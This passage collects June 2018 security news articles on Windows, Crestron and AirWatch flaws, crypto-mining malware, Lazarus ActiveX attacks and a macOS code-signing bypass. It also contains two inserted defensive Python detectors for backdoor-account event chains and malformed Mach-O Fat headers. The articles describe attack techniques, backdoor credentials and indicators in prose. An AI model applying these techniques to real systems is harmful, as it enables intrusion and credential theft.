“The attacker could attempt to man-in-the-middle a legitimate query. The more likely scenario is simply tricking a target DNS server into querying an evil server that sends the corrupted response – something that can be done from the command line. It’s also something that could be easily scripted. This means there’s a SYSTEM-level bug in a listening service on critical infrastructure servers, which also means this is wormable.”

Another critical flaw addressed with the Patch Tuesday updates for June 2018 is a remote code execution flaw tracked as CVE-2018-8231 that resides in the HTTP protocol stack (HTTP.sys) of Windows 10 and Windows Server 2016.

The flaw could allow remote attackers to execute arbitrary code and take control of the affected systems.

The vulnerability is caused by HTTP.sys improperly handling objects in memory; an attacker can trigger it by sending a specially crafted packet to an affected Windows system, leading to arbitrary code execution.

“This patch covers another serious bug in a web-facing service. This time, the web server component http.sys is affected. A remote attacker could cause code execution by sending a malformed packet to a target server. Since http.sys runs with elevated privileges, the attacker’s code would get that same privilege.” continues ZDI.

The Patch Tuesday updates for June 2018 also address a privilege escalation vulnerability affecting the Cortana voice assistant. The flaw, tracked as CVE-2018-8140, is rated as “important.”

In this case, the attacker needs physical or console access to the system to trigger the flaw.


New 'PyRoMineIoT' Malware Spreads via NSA-Linked Exploit
12.6.2018 securityweek 
Virus 

A recently discovered piece of crypto-currency miner malware isn’t only abusing a National Security Agency-linked remote code execution exploit to spread, but also abuses infected machines to scan for vulnerable Internet of Things (IoT) devices.

Dubbed PyRoMineIoT, the malware is similar to the PyRoMine crypto-currency miner that was detailed in late April. Both mine for Monero, both are Python-based, and both use the EternalRomance exploit for propagation purposes (the vulnerability was patched in April last year).

The older threat, Fortinet’s Jasper Manuel reveals, has received an update to add some obfuscation, likely in an attempt to evade detection from anti-virus programs.

The latest PyRoMine variant is hosted on the same IP address 212[.]83.190[.]122, was compiled with PyInstaller into a stand-alone executable, and continues to use the EternalRomance implementation found on the Exploit Database website, the same as the initially analyzed variant.

After a successful exploitation, an obfuscated VBScript is downloaded. The VBScript has the same functionality as the previously used one, but features more organized code and also adds a version number.

As before, it sets up a Default account with the password P@ssw0rdf0rme, adds the account to the local groups “Administrators,” “Remote Desktop Users,” and “Users,” then enables RDP and adds a firewall rule to allow traffic on port 3389.

The VBScript also downloads other components, including a Monero miner (XMRig), but now uses randomly generated names for these files. The malware attempts to remove older versions of PyRoMine from the system.
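The post-exploitation steps described above (new local account, privileged group membership, RDP enabled, firewall exception) leave a distinctive trail in the Windows Security log. The following is an added detection example, not code from Fortinet or from the article: it correlates those events per host inside a short time window. The sample records are constructed and use a simplified flat layout rather than the raw EVTX field names; the event IDs (4720 account created, 4732 member added to a local group, 4946 firewall rule added) are the standard Security log IDs for those actions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
PRIV_GROUPS = {"Administrators", "Remote Desktop Users"}
KNOWN_BACKDOOR_ACCOUNTS = {"Default"}   # account name reported for PyRoMine

# Constructed sample records (simplified normalisation, not raw EVTX fields):
# 4720 = user account created, 4732 = member added to a security-enabled
# local group, 4946 = a rule was added to the Windows Firewall exception list.
SAMPLE_EVENTS = [
    {"ts": "2018-06-06T10:00:05", "host": "WS01", "event_id": 4720, "user": "Default"},
    {"ts": "2018-06-06T10:00:06", "host": "WS01", "event_id": 4732, "user": "Default",
     "group": "Administrators"},
    {"ts": "2018-06-06T10:00:06", "host": "WS01", "event_id": 4732, "user": "Default",
     "group": "Remote Desktop Users"},
    {"ts": "2018-06-06T10:00:06", "host": "WS01", "event_id": 4732, "user": "Default",
     "group": "Users"},
    {"ts": "2018-06-06T10:00:09", "host": "WS01", "event_id": 4946, "rule": "RDP-3389-allow"},
    # routine admin work on another host: no group change or firewall rule in the window
    {"ts": "2018-06-06T11:30:00", "host": "WS02", "event_id": 4720, "user": "jsmith"},
    {"ts": "2018-06-06T12:15:00", "host": "WS02", "event_id": 4946, "rule": "Printer sharing"},
]


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")


def detect_rdp_backdoor_chain(events, window=WINDOW):
    """Alert when, on one host and within `window` of an account being created,
    that account is added to a privileged or RDP group AND a firewall
    exception is added. Each alert carries the evidence it was built from."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):   # tolerate out-of-order input
        by_host[ev["host"]].append(ev)

    alerts = []
    for host, evs in by_host.items():
        for i, ev in enumerate(evs):
            if ev["event_id"] != 4720:
                continue
            user, start = ev["user"], _ts(ev["ts"])
            groups, rules = set(), []
            for later in evs[i + 1:]:
                if _ts(later["ts"]) - start > window:
                    break                                # outside the window
                if (later["event_id"] == 4732 and later.get("user") == user
                        and later.get("group") in PRIV_GROUPS):
                    groups.add(later["group"])
                elif later["event_id"] == 4946:
                    rules.append(later.get("rule", "?"))
            if groups and rules:
                alerts.append({
                    "host": host, "user": user, "groups": sorted(groups),
                    "firewall_rules": rules,
                    # the reported account name raises confidence but is not required
                    "confidence": "high" if user in KNOWN_BACKDOOR_ACCOUNTS else "medium",
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_backdoor_chain(SAMPLE_EVENTS):
        print(alert)
```

Event 4946 is only written when the firewall rule-level policy change audit subcategory is enabled, so confirm that audit setting before relying on this chain.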

One of the pool addresses used by the malware suggests the actors made around 5 Monero (about $850) from their nefarious activities. The malware has infected a large number of systems since April, with the top 5 affected countries being Singapore, India, Taiwan, Côte d’Ivoire, and Australia.

The newly discovered PyRoMineIoT, Manuel says, is similar to PyRoMine, hence the similar naming. The threat is served from “an obviously malicious looking website,” disguised as security updates for web browsers.

The fake updates are downloaded as .zip archives that contain a downloader agent written in C#. This agent fetches the miner file and other malicious components, including a Python-based malware that leverages EternalRomance to spread the downloader to vulnerable machines in the network.

The agent also fetches a component to steal user credentials from Chrome, and another to scan for IoT devices in Iran and Saudi Arabia that use the admin:admin username and password pair.

The EternalRomance implementation uses the same code base as PyRoMine and works in a similar manner, collecting the IPs of local subnets and iterating through them to execute the payload. It uses the username ‘aa’ with an empty password.

The second component is part of the legitimate ChromePass tool that allows users to recover passwords from the Chrome browser. As part of these attacks, it is abused to steal credentials from unsuspecting users: the tool saves the recovered credentials in XML format and uploads the file to an account on DriveHQ’s cloud storage service (the account has been already disabled).

The most interesting aspect of this malware, however, is its ability to search for vulnerable IoT devices, but it only targets those in Iran and Saudi Arabia for that. The threat sends the IP information of discovered devices to the attacker’s server, supposedly in preparation for further attacks.

Like PyRoMine, the malware downloads the XMRig miner on the compromised system. After checking one of the pool addresses used by the threat, however, the researcher discovered that it hasn’t generated revenue yet. This isn’t surprising, considering that the malware only started being distributed on June 6, 2018, and is an unfinished project.

“This development confirms yet again that malware authors are very interested in cryptocurrency mining, as well as in capturing a chunk of the IoT threat ecosystem. We predict that this trend will not fade away soon, but will continue as long as there are opportunities for the bad guys to easily earn money by targeting vulnerable machines and devices,” Fortinet concludes.


North Korean Hackers Abuse ActiveX in Recent Attacks
12.6.2018 securityweek  BigBrothers

An ActiveX zero-day vulnerability discovered recently on the website of a South Korean think tank focused on national security has been abused by the North Korean-linked Lazarus group in attacks, AlienVault reports.

ActiveX controls are usually disabled on most systems, but the South Korean government demands they are enabled on machines in the country. This has led to numerous attacks abusing ActiveX to compromise systems in South Korea, with many of the attacks attributed to North Korean hackers.

The same applies to the newly observed attacks, where JavaScript code was used to deploy various ActiveX vulnerabilities, including a zero-day. Soon after the attacks occurred, local media attributed them to the Andariel gang, which is said to be part of Lazarus, the state-sponsored hacking group considered the most serious threat against banks.

Also referred to as BlueNoroff, the group has orchestrated high profile attacks such as the devastating attack against Sony Pictures in late 2014 and the $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank in 2016. This year, the actor supposedly switched targets to cryptocurrency, but also hit an online casino in Central America.

According to a new AlienVault report, the Lazarus hackers were behind the recently revealed ActiveX attacks as well.

The group used a profiling script as the initial reconnaissance tool, in an attempt to gather information on possible targets. Although this is a tactic the Lazarus group has employed before, other threat actors use it as well.

The next step of the attack involved scripts capable of gathering additional information from the system and designed to deliver the ActiveX exploit.

In a tweet several weeks ago, Cyber Warfare Intelligence Center and IssueMakersLab founder Simon Choi shared some details on the scripts used in the assault, revealing that an initial reconnaissance stage was deployed in January 2017, while script injections only occurred in late April 2018.

The script was designed to identify the browser and operating system running on the victim’s machine and borrows much of the code from PinLady’s Plugin-Detect. When detecting Internet Explorer on a machine, the script checks if ActiveX is enabled, as well as plugins running (from a specific list of ActiveX components).

AlienVault also notes that one of the other scripts involved in the attack, apparently used for profiling, sends data to a website that might have been compromised a while back, as it was previously recorded as a command and control (C&C) server for Lazarus malware in 2015.

The ActiveX exploit used in the recent assault, also shared by Simon Choi on Twitter, was meant to download malware from peaceind[.]co.kr and save it to the system as splwow32.exe.

“Splwow32.exe is a fairly uncommon filename for malware, and was previously seen in the Taiwan bank heist which has been attributed to another sub-set of the Lazarus attackers. We also note that the peaceind[.]co.kr site has been previously identified as vulnerable,” AlienVault says.

The malware appears to be called Akdoor, a simple backdoor designed to execute commands using Command Prompt. The malware also uses a “distinctive command and control protocol,” the security researchers say.


Crestron Patches Command Injection Flaw in DGE-100 Controller
12.6.2018 securityweek  ICS

Crestron recently addressed a command injection vulnerability in the console service preinstalled on the Digital Graphics Engine 100 (DGE-100) and other hardware controllers made by the company.

Tracked as CVE-2018-5553, the vulnerability has a base CVSSv3 score of 9.8 and is considered Critical severity. Discovered by Rapid7, the security bug is the result of lack of input sanitization and allows an attacker able to connect to the device over TCP port 41795 to gain root-level access.

The DGE-100 controller allows users to connect a touchscreen interface to external sources over HDMI, USB, or Ethernet. The device, which is usually paired with the Crestron TSD-2220 HD touchscreen display, is typically deployed in corporate meeting spaces or control rooms and is distributed globally.

The Crestron console service on DGE-100 is listening on TCP port 41795 and requires “a proprietary management tool” to use. The hardware controller, however, does not require credentials for administrative access to the console service by default.

“By connecting to this service with netcat and using the `ping` command with an argument constructed of shell-expandable variables, it is possible to inject operating system commands that will be executed by this console, which itself runs as root,” Rapid7 explains in a report.

The vulnerability occurs only if the default configuration is left in place, which means that credentials are not required for administrative access. Thus, anyone able to connect to the device’s TCP port 41795 can elevate to a root shell on the device, the security firm explains.

By exploiting the issue, an attacker could co-opt the device for a persistent “beachhead” into the affected network. The attacker would have unfettered access to the device’s core functionality, thus being able to intercept and modify any data, including what’s served over the Ethernet, HDMI, or USB ports.

The issue was discovered in March 2018 and reported to the vendor in early April. All DGE-100 devices running firmware version 1.3384.00049.001 and lower with default configuration are vulnerable. Crestron noted in an advisory published last week that TS-1542-C and DM-DGE-200-C devices are also impacted.

A patch was released on June 4 and owners of affected devices are advised to apply it as soon as possible. The update (firmware version 1.3384.00059.001 or higher addresses the bug) is available on Crestron’s website.

“Crestron took immediate action upon receiving the information and has created updates to remediate this concern. Crestron has no evidence of any customers being impacted by this issue. If customers have configured their systems based on our published security best practices, then the risk is low as an authenticated user would be required to exploit this vulnerability,” the vendor said.


Code Signing Flaw Affects all Mac OS Versions Since 2005
12.6.2018 securityweek  Apple

Okta Rex (Research and Exploitation) researcher Josh Pitts has discovered a method of exploiting the code signing mechanism in MacOS. If exploited, the flaw could allow malicious untrusted code to masquerade as legitimate trusted code and bypass checks by other security software.

Code signing attacks are not new. However, writes Pitts in public disclosure published today, "Unlike some of the prior work, this current vulnerability does not require admin access, does not require JIT'ing code, or memory corruption to bypass code signing checks. All that is required is a properly formatted Fat/Universal file and code signing checks return valid." Any Mac operating system since the 2005 introduction of OS X Leopard is vulnerable to this flaw.

Code signing works by cryptographically confirming that new code is authentic and not malicious code authored by a bad actor impersonating the original developer. While almost anything, from binaries to PowerShell scripts, can be signed on Windows, on MacOS code signing focuses on the Mach-O binary and application bundles to ensure only trusted code is executed in memory.

"Security, incident response, and forensics processes and personnel use code signing to weed out trusted code from untrusted code," explains Pitts. "By verifying signed code, detection and response personnel can speed up investigations by separating trusted code from untrusted code."

Pitts discovered, however, that the code signing mechanism in MacOS can be manipulated. All it requires is access to a genuinely signed Fat/Universal file. Other conditions require that the first Mach-O in the file must be validly signed by Apple; the added malicious code must be adhoc signed and i386 compiled for an x86_64 bit target macOS; and the CPU_TYPE in the Fat header must be set to an invalid type or CPU Type that is not native to the host chipset.

Okta Rex told SecurityWeek that this technique bypasses the gamut of whitelisting, incident response, and process inspection solutions by appearing to be signed by Apple's own root certificate.

The simple explanation is that the mechanism accepts the Apple signing, but skips this code and executes the malicious code. "By setting the CPU_Type to an invalid type or valid not native CPU type (example: PPC), the Mach-O loader will skip over the validly signed Mach-O binary and execute the malicious (non-Apple signed) code," writes the researcher.

In effect, the good code is skipped because CPU_TYPE is wrong; but the subsequent malicious code is run because the code signing API has a preference for the native CPU architecture (x86_64) for code signing checks and will default to checking the unsigned code if it is x86_64.
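The inconsistency the paragraphs above describe is visible in the file itself: the fat_arch entry declares one CPU type while the Mach-O header inside that slice declares another, and only one slice carries Apple's signature. As an added defensive example (not code from Okta Rex or from the article), the following Python parses a Fat/Universal header and reports such mismatches so that each slice can be verified on its own instead of trusting the file as a whole. The constants are the standard values from <mach-o/fat.h> and <mach/machine.h>; the two sample files are constructed fixtures made of headers only, with no executable code.

```python
import struct

FAT_MAGIC = 0xCAFEBABE                      # the Fat header is always big-endian
MH_MAGIC, MH_MAGIC_64 = 0xFEEDFACE, 0xFEEDFACF
CPU_ARCH_ABI64 = 0x01000000
CPU_TYPE_X86 = 7
CPU_TYPE_X86_64 = CPU_TYPE_X86 | CPU_ARCH_ABI64
CPU_TYPE_ARM64 = 12 | CPU_ARCH_ABI64
CPU_TYPE_POWERPC = 18
CPU_NAMES = {CPU_TYPE_X86: "i386", CPU_TYPE_X86_64: "x86_64",
             CPU_TYPE_ARM64: "arm64", CPU_TYPE_POWERPC: "ppc"}


def parse_fat_header(data):
    """Return the fat_arch entries of a Fat/Universal file as dicts."""
    if len(data) < 8:
        raise ValueError("file too short for a Fat header")
    magic, nfat = struct.unpack(">II", data[:8])
    if magic != FAT_MAGIC:
        raise ValueError("not a Fat/Universal file")
    entries = []
    for i in range(nfat):
        off = 8 + i * 20                    # sizeof(struct fat_arch) == 20
        cputype, cpusubtype, offset, size, align = struct.unpack(
            ">iIIII", data[off:off + 20])
        entries.append({"cputype": cputype, "cpusubtype": cpusubtype,
                        "offset": offset, "size": size, "align": align})
    return entries


def slice_cputype(body):
    """cputype claimed by the slice's own mach_header (either endianness), or None."""
    if len(body) < 8:
        return None
    for fmt in ("<Ii", ">Ii"):
        magic, cputype = struct.unpack(fmt, body[:8])
        if magic in (MH_MAGIC, MH_MAGIC_64):
            return cputype
    return None


def cpu_name(cputype):
    return CPU_NAMES.get(cputype, "unknown 0x%08x" % (cputype & 0xFFFFFFFF))


def audit_fat(data, host_cputype=CPU_TYPE_X86_64):
    """Return (level, message) findings. 'suspicious' marks the inconsistencies
    that matter here; 'info' marks slices that must be verified on their own
    rather than inheriting trust from the first slice in the file."""
    findings = []
    for idx, e in enumerate(parse_fat_header(data)):
        declared = cpu_name(e["cputype"])
        end = e["offset"] + e["size"]
        if end > len(data):
            findings.append(("suspicious", f"slice {idx} ({declared}) runs past end of file"))
            continue
        inner = slice_cputype(data[e["offset"]:end])
        if inner is None:
            findings.append(("suspicious", f"slice {idx} ({declared}) has no Mach-O header"))
        elif inner != e["cputype"]:
            findings.append(("suspicious", f"slice {idx}: fat_arch says {declared} but the "
                                           f"slice's mach_header says {cpu_name(inner)}"))
        if e["cputype"] not in CPU_NAMES:
            findings.append(("suspicious", f"slice {idx} declares {declared}"))
        elif e["cputype"] != host_cputype:
            findings.append(("info", f"slice {idx} ({declared}) is not native to this host; "
                                     "verify its signature separately"))
    return findings


# --- constructed fixtures: headers only, no executable code -------------------
def mach_header(cputype, is64):
    """Minimal little-endian mach_header / mach_header_64 with zeroed fields."""
    if is64:
        return struct.pack("<IiIIIIII", MH_MAGIC_64, cputype, 3, 2, 0, 0, 0, 0)
    return struct.pack("<IiIIIII", MH_MAGIC, cputype, 3, 2, 0, 0, 0)


def build_fat(slices):
    """Fat file from [(declared_cputype, slice_bytes), ...], 16-byte aligned."""
    header_len = 8 + 20 * len(slices)
    offset = (header_len + 15) & ~15
    header = struct.pack(">II", FAT_MAGIC, len(slices))
    bodies = b""
    for declared, body in slices:
        body = body.ljust((len(body) + 15) & ~15, b"\0")
        header += struct.pack(">iIIII", declared, 3, offset, len(body), 4)
        bodies += body
        offset += len(body)
    return header.ljust((header_len + 15) & ~15, b"\0") + bodies


# Mirrors the condition in the text: the first entry declares PPC but the slice
# inside it is x86_64 code; the second entry is a consistent i386 slice.
SAMPLE_SUSPICIOUS = build_fat([(CPU_TYPE_POWERPC, mach_header(CPU_TYPE_X86_64, True)),
                               (CPU_TYPE_X86, mach_header(CPU_TYPE_X86, False))])
# A well-formed x86_64 + arm64 universal file for comparison.
SAMPLE_CLEAN = build_fat([(CPU_TYPE_X86_64, mach_header(CPU_TYPE_X86_64, True)),
                          (CPU_TYPE_ARM64, mach_header(CPU_TYPE_ARM64, True))])

if __name__ == "__main__":
    for label, blob in (("suspicious", SAMPLE_SUSPICIOUS), ("clean", SAMPLE_CLEAN)):
        print(label)
        for level, msg in audit_fat(blob):
            print(f"  [{level}] {msg}")
```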

Okta Rex contacted Apple on February 22, 2018 with a report and proof of concept examples that were able to bypass third-party security tools. Apple responded in March by saying it did not see this issue as a security problem that it should directly address.

Okta Rex disagreed, and informed Apple that it would notify third-party developers itself so that they could address the issues at their end. By early April it had notified — through CERT/CC — all known affected third party developers. These include VirusTotal, Google, Facebook, Objective Development, F-Secure, Objective-See, Yelp, and Carbon Black.

The researcher also recommended to CERT/CC on April 18 "that a public blog post is the best method for reaching third parties that use code signing APIs in a private manner."

The researcher is not aware of any prior abuse of this technique by bad actors. Nevertheless, by exploiting this vulnerability, a threat actor could trick third-party security tools into believing their code is Apple-approved, letting malicious code live on a macOS machine until it’s patched.


$175 Million in Monero Mined via Malicious Programs: Report
12.6.2018 securityweek  Cryptocurrency

The popularity of crypto-currency malware has been skyrocketing over the past year, and the segment appears to have been highly lucrative for cybercriminals, a new Palo Alto Networks report reveals.

With the number of malware samples ultimately delivering crypto-miners well over the half-million mark, it’s no wonder that miscreants are able to profit from this type of nefarious activity. To these, one can add the JavaScript, or web-based, malicious mining operations, which are highly lucrative as well.

Looking into the proliferation of crypto-mining malware, Palo Alto’s Josh Grunzweig discovered information on around 630,000 malicious samples, 3,773 emails used to connect with mining pools, and 2,995 mining pool URLs.

Over 530,000 malware samples target Monero, roughly 53,000 target Bitcoin, and 16,000 target Cryptonite (XCN), with the rest spread across the remaining currencies. The researcher also identified 2,341 Monero (XMR) wallets, 981 Bitcoin (BTC) wallets, 131 Electroneum (ETN) wallets, 44 Ethereum (ETH) wallets, and 28 Litecoin (LTC) wallets.

Given the clear interest cybercriminals have in Monero, the researcher focused on this virtual coin as well. In addition to the 2,341 Monero wallets extracted from the analyzed sample set, he also managed to determine the mining pools used, and discovered that, of the top ten mining pools used by this malware, all but one allows for anonymous viewing of statistics based off of the wallet as an identifier.

“By querying the top eight mining pools for all 2,341 Monero addresses, I was able to determine exactly how much Monero has been mined historically with a high degree of accuracy. By querying the mining pools themselves, instead of the blockchain, we’re able to say exactly how much has been mined without the fear of the data being polluted by payments to those wallets via other sources,” he notes.

Thus, Grunzweig determined that a total of 798613.33 XMR has been mined to date, representing around 5% of all Monero in circulation. Web-based Monero miners and miners the researcher doesn’t have visibility into aren’t included here.

While half of the 2,341 wallets identified have been unable to generate a meaningful amount of Monero, the remaining batch obtained over $140 million, the researcher estimates. According to Grunzweig, “a total of $175m has been found to be mined historically via the Monero currency.”

1,278 (55%) of the identified wallets earned 0.01 XMR (~$2.20) or more and only a small subset earned a significant (100 XMR or greater) amount of coins. Only 99 wallets (less than 2% of all wallets identified) have received over 1,000 XMR, and 16 wallets (0.68% of all wallets) have obtained over 10,000 XMR.

Looking at the total hashing power, the research revealed the attackers only used 2% of the global hashing power mining the Monero network. At around 19MH/s, the hashrate would result in approximately $30,443 per day being mined.

“To date, the popularity of malicious cryptocurrency mining activity continues to skyrocket. The large growth of malware mining cryptocurrencies is a direct result of a previous spike in value, which has since corrected to a value that is more in line with expectations. As this correction has taken place, only time will tell if cryptocurrency miners will continue in popularity. It is clear that such activities have been incredibly profitable for individuals or groups who have mined cryptocurrency using malicious techniques for a long period of time,” Palo Alto concludes.


VMware addresses a critical remote code execution vulnerability in AirWatch Agent
12.6.2018 securityaffairs
Vulnerebility

VMware has found a critical remote code execution vulnerability in the AirWatch Agent applications for Android and Windows Mobile.
The agent is installed by users on a mobile device to allow AirWatch to manage it.

The flaw, tracked as CVE-2018-6968, “may allow for unauthorized creation and execution of files in the Agent sandbox and other publicly accessible directories such as those on the SD card by a malicious administrator.”

“Due to an authorization flaw in the real-time File Manager capability for Android and Windows Mobile devices and Registry Manager for Windows Mobile devices, it is possible for a remote attacker with knowledge of specific enrolled devices within an AirWatch instance to add or remove files from a device, remotely execute commands on the device, or modify or set Registry Key values for Windows Mobile devices that are configured to use AirWatch Cloud Messaging (AWCM).” reads the advisory published by VMware.

“This vulnerability is identified by CVE-2018-6968 and is documented in VMSA-2018-0015”

“The attacker does not need access to the Workspace ONE UEM Console. Access to read and store files on Android devices is limited to files within the Agent sand­­box and other publicly accessible directories such as those on the SD card. Access to files on Windows Mobile/CE devices involves the entire device directory,” it added.

VMware has addressed the flaw with the release of version 8.2 for Android and 6.5.2 for Windows Mobile; the iOS version of the VMware AirWatch agent is not impacted.

Experts also provided a workaround for Android users, who can choose C2DM/GCM instead of AWCM as their preferred push notification service.

The security updates address the vulnerability by disabling the flawed file, task, and registry management capabilities. VMware will deprecate the functionality in the next months.

“Through mitigation of this security vulnerability, the File, Task & Registry Management capabilities built into AWCM will be disabled in current SaaS environments over the coming weeks. Additionally, this functionality will be deprecated in future releases of the Workspace ONE UEM Console.”


Splunk to Acquire DevOps Alert Firm VictorOps for $120 Million
12.6.2018 securityweek  IT

Machine data solutions firm Splunk announced Monday that it has agreed to acquire alert management start-up VictorOps for approximately $120 million. The acquisition is expected to close during Splunk's FQ2, subject to customary closing conditions, and will be funded by cash from Splunk's balance sheet.

The acquisition makes sense. Splunk uses data analytics and artificial intelligence to locate alert incidents within masses of log data. VictorOps manages the delivery of alerts to the right on-call technical staff. Together, they combine data analytics with DevOps practices.

"The world is changing," explains VictorOps' CEO and co-founder Todd Vernon in an associated blog. "Companies are increasingly relying on software for their competitive advantage in business. Software that historically changed a few times a year, now changes hourly or even by the minute in progressive, market-savvy companies."

VictorOps was founded to provide a collaborative way to quickly resolve software incidents. "By combining VictorOps incident management capabilities and the Splunk platform," Vernon continued, "organizations will be able to quickly resolve and even help prevent issues that degrade customer engagement. We look forward to joining Splunk and working together to help solve these complex challenges facing every Development and DevOps team."

"The combination of machine data analytics and artificial intelligence from Splunk with incident management from VictorOps creates a 'Platform of Engagement' that will help modern development teams innovate faster and deliver better customer experiences," added Doug Merritt, president and CEO at Splunk. The intention is that the integration of Splunk Enterprise with VictorOps will deliver monitoring, event management, on-call management and ChatOps.

'Platform of engagement' is also the term used by VictorOps. "Modern Incident Management," wrote Vernon, "is in a period of strategic change where data is king, and insights from that data are key to maintaining a market leading strategy. We look forward to working together to create a 'Platform of Engagement' that uses the most actionable information available and correlates monitoring and incident management data to foster shared understanding, speed resolution, and leverage AI to recommend solutions."

The acquisition of VictorOps builds on the earlier $350 million acquisition of Phantom. While Phantom also helps automate IT teams' responses to alerts, it lacks VictorOps' team collaboration capabilities.

VictorOps was founded in 2012 by Bryce Ambraziunas, Dan Jones and Todd Vernon. In 2016 it raised $15 million in Series B funding, bringing the total funding raised to $33.7 million. Investors include Silicon Valley firms Shea Ventures and Costanoa Ventures.

San Francisco, CA-based Splunk was founded in 2003. VictorOps is its seventh acquisition, including Phantom earlier this year, and SignalSense in October 2017. Both Phantom and VictorOps had a year-long product integration partnership with Splunk prior to acquisition.

"Upon close," wrote Vernon, "VictorOps will join Splunk's IT Markets group and together will provide on-call technical staff an analytics and AI-driven approach for addressing the incident lifecycle, from monitoring to response to incident management to continuous learning and improvement."

Splunk plans to retain VictorOps' approximately 90 employees after the acquisition.


U.S. Blacklists Russian Firms Tied to FSB Hacking Ops
12.6.2018 securityweek BigBrothers

The United States placed five Russian companies and three individuals on its sanctions blacklist Monday for allegedly supporting the FSB intelligence agency's hacking operations, including a firm involved in subsea operations.

The US Treasury named Digital Security and two subsidiaries as helping develop offensive cyber capabilities for Russian intelligence services, including the already-sanctioned FSB.

The Kvant Scientific Research Institute was also included on the blacklist, as a state enterprise supervised by the FSB.

In addition, Divetechnoservices and three officials of the firm were sanctioned for supplying and supporting the government's underwater capabilities in monitoring and hacking subsea communications cables around the world.

US officials have become alarmed over the past year at the extent of US-targeted offensive cyber operations that Washington alleges have official backing from Moscow.

Those include the global NotPetya cyber attack, which paralyzed thousands of computers around the world last year; intrusions into the control systems of the US energy grid; and the insertion of trojans into home and company networking devices around the world, which allow both the diversion of data and attacks that could shut down networks.

The sanctions freeze property and assets under US jurisdiction and seek to lock those named out of global financial networks.


74 Arrested in International Operation Targeting BEC Scams
12.6.2018 securityweek Crime

A total of 74 individuals have been arrested as part of an international law enforcement operation targeting business email compromise (BEC) scams, U.S. authorities announced on Monday.

Forty-two people have been arrested in the United States, 29 in Nigeria, and three in Canada, Mauritius, and Poland. The operation, dubbed “Wire Wire” and conducted over a period of six months, also resulted in the seizure of nearly $2.4 million and the disruption and recovery of roughly $14 million in fraudulent wire transfers, according to the Department of Justice and the FBI.

Some of the suspects are believed to have been involved in schemes targeting businesses of all sizes, while others targeted individual victims.

The Justice Department said 23 individuals were charged in the Southern District of Florida with laundering at least $10 million obtained from BEC scams. The list of suspects also includes two Nigerian nationals living in Dallas, Texas, who tricked a real estate closing attorney into wiring $246,000 to accounts they controlled.

A separate indictment targets three individuals, two of which were extradited to the United States from the United Kingdom and Mauritius.

BEC scams, which authorities also call cyber-enabled financial fraud, often target employees with access to company finances and trick them into making wire transfers to bank accounts controlled by the criminals. The FBI has received reports of losses totaling more than $3.7 billion since the agency’s Internet Crime Complaint Center (IC3) has been keeping track of BEC scams.

“The federal law enforcement agencies that executed on this takedown deserve our gratitude” said Christy Wyatt, CEO of Dtex Systems, a security provider that helps organizations defend their most trusted insiders. “Removing 42 criminals off of our cyber streets will hopefully make things safer, serve as warning to others and provide us with details that will help us to be more secure moving forward. The operation is also a reminder that most major cybercrimes involve employee error and under-utilization of technology and education resources that can be used to defend our most trusted insiders.”


VMware Patches Code Execution Flaw in AirWatch Agent
12.6.2018 securityweek Vulnerebility

VMware has addressed a critical remote code execution vulnerability in the AirWatch Agent applications for Android and Windows Mobile.

The VMware Workspace ONE platform, which is powered by AirWatch unified endpoint management (UEM) technology, is designed to help organizations manage corporate endpoints and improve enterprise productivity.

Workspace ONE provides a File Manager application for Android and Windows Mobile/CE and Task/Registry Manager apps for Windows Mobile/CE. These apps use legacy technologies and they are separate from the ones available through the AirWatch platform.

VMware has published an advisory and a support article to warn users that these mobile applications are affected by a critical vulnerability tracked as CVE-2018-6968.

“Due to an authorization flaw in the real-time File Manager capability for Android and Windows Mobile devices and Registry Manager for Windows Mobile devices, it is possible for a remote attacker with knowledge of specific enrolled devices within an AirWatch instance to add or remove files from a device, remotely execute commands on the device, or modify or set Registry Key values for Windows Mobile devices that are configured to use AirWatch Cloud Messaging (AWCM),” VMware said.

“The attacker does not need access to the Workspace ONE UEM Console. Access to read and store files on Android devices is limited to files within the Agent sandbox and other publicly accessible directories such as those on the SD card. Access to files on Windows Mobile/CE devices involves the entire device directory,” it added.

The security hole has been patched with the release of version 8.2 for Android and 6.5.2 for Windows Mobile. The iOS version of the agent is not impacted.

The updates address the problem by disabling the flawed file, task and registry management capabilities, and VMware says it plans on deprecating the functionality in future releases of the Workspace ONE console.

In late May, VMware informed customers of a vulnerability that allowed a local attacker to escalate privileges to root on Linux machines running VMware Horizon Client for Linux.


Vietnam MPs Approve Sweeping Cyber Security Law
12.6.2018 securityweek BigBrothers

Vietnamese lawmakers on Tuesday approved a sweeping cyber security law which could compel Facebook and Google to take down critical posts within 24 hours, as space for debate is crushed inside the Communist country.

Activists and dissenters are routinely harassed, jailed or tied up in legal cases in Vietnam, a one-party state which is hyper-sensitive to critical public opinion.

Social media and Internet forums have provided a rare platform to share and debate views against authorities.

But the bill, waved through by an overwhelming majority of MPs in the National Assembly, is poised to end that relative freedom.

The law's far-reaching provisions mean internet companies will have to remove posts deemed to be a "national security" threat within a day and store personal information and data of their users inside Vietnam.

"Currently, Google and Facebook store personal data of Vietnamese users in Hong Kong and Singapore," Vo Trong Viet, chairman of National Assembly's defence and security committee told lawmakers.

"Putting data centres in Vietnam will increase expenses for the service providers... but it is necessary to meet the requirements of the country's cyber security."

The new law outlaws material encouraging public gatherings or that "offends" everything from the national flag to the country's leaders and "heroes".

There was no immediate detail of the punishment for violating the new rules.

Only 15 out of the 466 MPs present in the rubber-stamp assembly voted against the bill, which the government says will become law from January 1, 2019.

Rights advocates said it further shrinks the small space for debate.

"In the country's deeply repressive climate, the online space was a relative refuge where people could go to share ideas and opinions with less fear of censure by the authorities," said Clare Algar of Amnesty International.

"With the sweeping powers it grants the government to monitor online activity, this vote means there is now no safe place left."

The Asia Internet Coalition, an advocacy group acting on behalf of Facebook, Google, Twitter and other tech firms in the region, said it was "disappointed" by the assembly's vote.

"Unfortunately, these provisions, will result in severe limitations on Vietnam's digital economy, dampening the foreign investment climate and hurting opportunities for local businesses and SMEs to flourish inside and beyond Vietnam," said Jeff Paine, managing director of the internet coalition.

The country's conservative leadership, which has been in charge since 2016, is waging a crackdown on activists and dissidents.

At least 26 dissidents and activists have been prosecuted during the first five months of this year, according to Human Rights Watch.

The government has also unveiled a 10,000-strong brigade to fight cybercrimes and "wrongful views" on the internet, according to state media reports.

